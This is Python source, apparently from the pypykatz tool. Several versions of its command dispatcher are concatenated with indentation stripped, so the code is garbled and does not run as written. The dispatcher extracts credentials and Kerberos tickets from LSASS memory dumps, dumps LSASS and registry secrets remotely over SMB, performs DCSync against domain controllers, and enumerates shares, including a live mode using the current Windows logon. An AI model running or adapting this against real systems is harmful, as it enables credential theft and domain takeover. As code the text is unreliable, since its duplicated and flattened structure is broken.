def run(self, args):
files_with_error = []
results = {}
###### Rekall
if args.cmd == 'rekall':
if args.kerberos_dir is not None and 'all' not in args.packages:
args.packages.append('ktickets')
mimi = pypykatz.parse_memory_dump_rekall(args.memoryfile,
args.timestamp_override,
packages=args.packages)
results['rekall'] = mimi
###### Minidump
elif args.cmd == 'minidump':
if args.directory:
dir_fullpath = os.path.abspath(args.memoryfile)
file_pattern = '*.dmp'
if args.recursive == True:
globdata = os.path.join(dir_fullpath, '**', file_pattern)
else:
globdata = os.path.join(dir_fullpath, file_pattern)
logging.info('Parsing folder %s' % dir_fullpath)
for filename in glob.glob(globdata, recursive=args.recursive):
logging.info('Parsing file %s' % filename)
try:
if args.kerberos_dir is not None and 'all' not in args.packages:
args.packages.append('ktickets')
mimi = pypykatz.parse_minidump_file(
filename, packages=args.packages)
results[filename] = mimi
if args.halt_on_error == True and len(mimi.errors) > 0:
raise Exception('Error in modules!')
except Exception as e:
files_with_error.append(filename)
logging.exception('Error parsing file %s ' % filename)
if args.halt_on_error == True:
raise e
else:
pass
else:
logging.info('Parsing file %s' % args.memoryfile)
try:
if args.kerberos_dir is not None and 'all' not in args.packages:
args.packages.append('ktickets')
mimi = pypykatz.parse_minidump_file(args.memoryfile,
packages=args.packages)
results[args.memoryfile] = mimi
if args.halt_on_error == True and len(mimi.errors) > 0:
raise Exception('Error in modules!')
except Exception as e:
logging.exception('Error while parsing file %s' %
args.memoryfile)
if args.halt_on_error == True:
raise e
else:
traceback.print_exc()
self.process_results(results, files_with_error, args)
async def run(self, args):
files_with_error = []
results = {}
###### Minidump
if args.cmd == 'minidump':
if args.directory:
dir_fullpath = os.path.abspath(args.memoryfile)
file_pattern = '*.dmp'
if args.recursive == True:
globdata = os.path.join(dir_fullpath, '**', file_pattern)
else:
globdata = os.path.join(dir_fullpath, file_pattern)
logging.info('Parsing folder %s' % dir_fullpath)
for filename in glob.glob(globdata, recursive=args.recursive):
logging.info('Parsing file %s' % filename)
try:
print('await')
mimi = await apypykatz.parse_minidump_file(
filename, packages=args.packages)
results[filename] = mimi
except Exception as e:
files_with_error.append(filename)
logging.exception('Error parsing file %s ' % filename)
if args.halt_on_error == True:
raise e
else:
pass
else:
logging.info('Parsing file %s' % args.memoryfile)
try:
mimi = await apypykatz.parse_minidump_file(
args.memoryfile, packages=args.packages)
results[args.memoryfile] = mimi
except Exception as e:
logging.exception('Error while parsing file %s' %
args.memoryfile)
if args.halt_on_error == True:
raise e
else:
traceback.print_exc()
self.process_results(results, files_with_error, args)
async def run(self, args):
from aiosmb import logger as smblog
if args.verbose == 0:
smblog.setLevel(100)
elif args.verbose == 1:
smblog.setLevel(level=logging.INFO)
else:
level = 5 - args.verbose
smblog.setLevel(level=level)
if args.smb_module == 'lsassfile':
from pypykatz.smb.lsassutils import lsassfile
mimi = await lsassfile(args.url, chunksize=args.chunksize, packages=args.packages)
self.process_results({'smbfile':mimi}, [], args)
elif args.smb_module == 'lsassdump':
from pypykatz.smb.lsassutils import lsassdump
mimi = await lsassdump(args.url, chunksize=args.chunksize, packages=args.packages)
self.process_results({'smbfile':mimi}, [], args)
elif args.smb_module == 'secretsdump':
from pypykatz.smb.lsassutils import lsassdump
from pypykatz.smb.regutils import regdump
from pypykatz.smb.dcsync import dcsync
try:
mimi = await lsassdump(args.url, chunksize=args.chunksize, packages=args.packages)
if mimi is not None:
self.process_results({'smbfile':mimi}, [], args, file_prefix='_lsass.txt')
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')
try:
po = await regdump(args.url)
if po is not None:
if args.outfile:
po.to_file(args.outfile+'_registry.txt', args.json)
else:
if args.json:
print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
else:
print(str(po))
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to get registry secrets')
try:
if args.outfile is not None:
outfile = open(args.outfile+'_dcsync.txt', 'w', newline = '')
async for secret in dcsync(args.url):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')
finally:
if args.outfile is not None:
outfile.close()
elif args.smb_module == 'dcsync':
from pypykatz.smb.dcsync import dcsync
if args.outfile is not None:
outfile = open(args.outfile, 'w', newline = '')
async for secret in dcsync(args.url, args.username):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
if args.outfile is not None:
outfile.close()
elif args.smb_module == 'regdump':
from pypykatz.smb.regutils import regdump
po = await regdump(args.url)
if po is not None:
if args.outfile:
po.to_file(args.outfile, args.json)
else:
if args.json:
print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
else:
print(str(po))
elif args.smb_module == 'regfile':
from pypykatz.smb.regutils import regfile
po = await regfile(args.url, args.system, sam = args.sam, security = args.security, software = args.software)
if po is not None:
if args.outfile:
po.to_file(args.outfile, args.json)
else:
if args.json:
print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
else:
print(str(po))
elif args.smb_module == 'shareenum':
from pypykatz.smb.shareenum import shareenum
output_type = 'str'
if args.json is True:
output_type = 'json'
if args.tsv is True:
output_type = 'tsv'
exclude_share = []
if args.es is not None:
exclude_share = args.es
exclude_dir = []
if args.ed is not None:
exclude_dir = args.ed
exclude_target = []
if args.et is not None:
exclude_target = args.et
await shareenum(
args.smb_url,
targets = args.target,
smb_worker_count = args.worker_count,
depth = args.depth,
out_file = args.out_file,
progress = args.progress,
max_items = args.maxitems,
dirsd = args.dirsd,
filesd = args.filesd,
output_type = output_type,
max_runtime = args.max_runtime,
exclude_share = exclude_share,
exclude_dir = exclude_dir,
ldap_url = args.ldap,
exclude_target = exclude_target,
)
elif args.smb_module == 'client':
from aiosmb.examples.smbclient import amain
la = SMBCMDArgs()
la.smb_url = args.url
la.verbose = args.verbose
if args.commands is not None and len(args.commands) > 0:
la.commands = []
if args.commands[0] == 'help':
la.commands = ['help']
else:
if args.commands[0] != 'login':
la.commands.append('login')
for command in args.commands:
la.commands.append(command)
await amain(la)
async def run_live(self, args):
if platform.system().lower() != 'windows':
raise Exception('Live commands only work on Windows!')
from aiosmb import logger as smblog
from winacl.functions.highlevel import get_logon_info
info = get_logon_info()
if args.livesmbcommand != 'shareenum':
smb_url = 'smb%s+sspi-%s://%s\\%s@%s' % (args.protocol_version, args.authmethod, info['domain'], info['username'], args.host)
if args.verbose == 0:
smblog.setLevel(100)
elif args.verbose == 1:
smblog.setLevel(level=logging.INFO)
else:
level = 5 - args.verbose
smblog.setLevel(level=level)
if args.livesmbcommand == 'client':
from aiosmb.examples.smbclient import amain
la = SMBCMDArgs()
la.smb_url = smb_url
la.verbose = args.verbose
if args.commands is not None and len(args.commands) > 0:
la.commands = []
if args.commands[0] == 'help':
la.commands = ['help']
else:
if args.commands[0] != 'login':
la.commands.append('login')
for command in args.commands:
la.commands.append(command)
await amain(la)
elif args.livesmbcommand == 'lsassdump':
from pypykatz.smb.lsassutils import lsassdump
mimi = await lsassdump(smb_url, chunksize=args.chunksize, packages=args.packages)
self.process_results({'smbfile':mimi}, [], args)
elif args.livesmbcommand == 'secretsdump':
from pypykatz.smb.lsassutils import lsassdump
from pypykatz.smb.regutils import regdump
from pypykatz.smb.dcsync import dcsync
try:
mimi = await lsassdump(smb_url, chunksize=args.chunksize, packages=args.packages)
if mimi is not None:
self.process_results({'smbfile':mimi}, [], args, file_prefix='_lsass.txt')
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')
try:
po = await regdump(smb_url)
if po is not None:
if args.outfile:
po.to_file(args.outfile+'_registry.txt', args.json)
else:
if args.json:
print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
else:
print(str(po))
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to get registry secrets')
try:
if args.outfile is not None:
outfile = open(args.outfile+'_dcsync.txt', 'w', newline = '')
async for secret in dcsync(smb_url):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')
finally:
if args.outfile is not None:
outfile.close()
elif args.livesmbcommand == 'dcsync':
from pypykatz.smb.dcsync import dcsync
if args.outfile is not None:
outfile = open(args.outfile, 'w', newline = '')
async for secret in dcsync(smb_url, args.username):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
if args.outfile is not None:
outfile.close()
elif args.livesmbcommand == 'regdump':
from pypykatz.smb.regutils import regdump
po = await regdump(smb_url)
if po is not None:
if args.outfile:
po.to_file(args.outfile, args.json)
else:
if args.json:
print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
else:
print(str(po))
elif args.livesmbcommand == 'shareenum':
from pypykatz.smb.shareenum import shareenum
output_type = 'str'
if args.json is True:
output_type = 'json'
if args.tsv is True:
output_type = 'tsv'
exclude_share = []
if args.es is not None:
exclude_share = args.es
exclude_dir = []
if args.ed is not None:
exclude_dir = args.ed
ldap_url = 'auto'
if args.skip_ldap is True:
ldap_url = None
exclude_target = []
if args.et is not None:
exclude_target = args.et
await shareenum(
smb_url = 'auto',
targets = args.target,
smb_worker_count = args.worker_count,
depth = args.depth,
out_file = args.out_file,
progress = args.progress,
max_items = args.maxitems,
dirsd = args.dirsd,
filesd = args.filesd,
authmethod = args.authmethod,
protocol_version = args.protocol_version,
output_type = output_type,
max_runtime = args.max_runtime,
exclude_share = exclude_share,
exclude_dir = exclude_dir,
ldap_url = ldap_url,
exclude_target = exclude_target,
)
async def run(self, args):
from aiosmb import logger as smblog
if args.verbose == 0:
smblog.setLevel(100)
elif args.verbose == 1:
smblog.setLevel(level=logging.INFO)
else:
level = 5 - args.verbose
smblog.setLevel(level=level)
if args.smb_module == 'lsassfile':
from pypykatz.smb.lsassutils import lsassfile
mimi = await lsassfile(args.url)
self.process_results({'smbfile': mimi}, [], args)
elif args.smb_module == 'lsassdump':
from pypykatz.smb.lsassutils import lsassdump
mimi = await lsassdump(args.url)
self.process_results({'smbfile': mimi}, [], args)
elif args.smb_module == 'secretsdump':
from pypykatz.smb.lsassutils import lsassdump
from pypykatz.smb.regutils import regdump
from pypykatz.smb.dcsync import dcsync
try:
mimi = await lsassdump(args.url)
if mimi is not None:
self.process_results({'smbfile': mimi}, [],
args,
file_prefix='_lsass.txt')
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')
try:
po = await regdump(args.url)
if po is not None:
if args.outfile:
po.to_file(args.outfile + '_registry.txt', args.json)
else:
if args.json:
print(
json.dumps(po.to_dict(),
cls=UniversalEncoder,
indent=4,
sort_keys=True))
else:
print(str(po))
except Exception as e:
logging.exception(
'[SECRETSDUMP] Failed to get registry secrets')
try:
if args.outfile is not None:
outfile = open(args.outfile + '_dcsync.txt',
'w',
newline='')
async for secret in dcsync(args.url):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')
finally:
if args.outfile is not None:
outfile.close()
elif args.smb_module == 'dcsync':
from pypykatz.smb.dcsync import dcsync
if args.outfile is not None:
outfile = open(args.outfile, 'w', newline='')
async for secret in dcsync(args.url, args.username):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
if args.outfile is not None:
outfile.close()
elif args.smb_module == 'regdump':
from pypykatz.smb.regutils import regdump
po = await regdump(args.url)
if po is not None:
if args.outfile:
po.to_file(args.outfile, args.json)
else:
if args.json:
print(
json.dumps(po.to_dict(),
cls=UniversalEncoder,
indent=4,
sort_keys=True))
else:
print(str(po))
elif args.smb_module == 'regfile':
from pypykatz.smb.regutils import regfile
po = await regfile(args.url,
args.system,
sam=args.sam,
security=args.security,
software=args.software)
if po is not None:
if args.outfile:
po.to_file(args.outfile, args.json)
else:
if args.json:
print(
json.dumps(po.to_dict(),
cls=UniversalEncoder,
indent=4,
sort_keys=True))
else:
print(str(po))
elif args.smb_module == 'console':
from aiosmb.examples.smbclient import amain
la = SMBCMDArgs()
la.smb_url = args.url
la.verbose = args.verbose
if args.commands is not None and len(args.commands) > 0:
la.commands = []
if args.commands[0] == 'help':
la.commands = ['help']
else:
if args.commands[0] != 'login':
la.commands.append('login')
for command in args.commands:
la.commands.append(command)
await amain(la)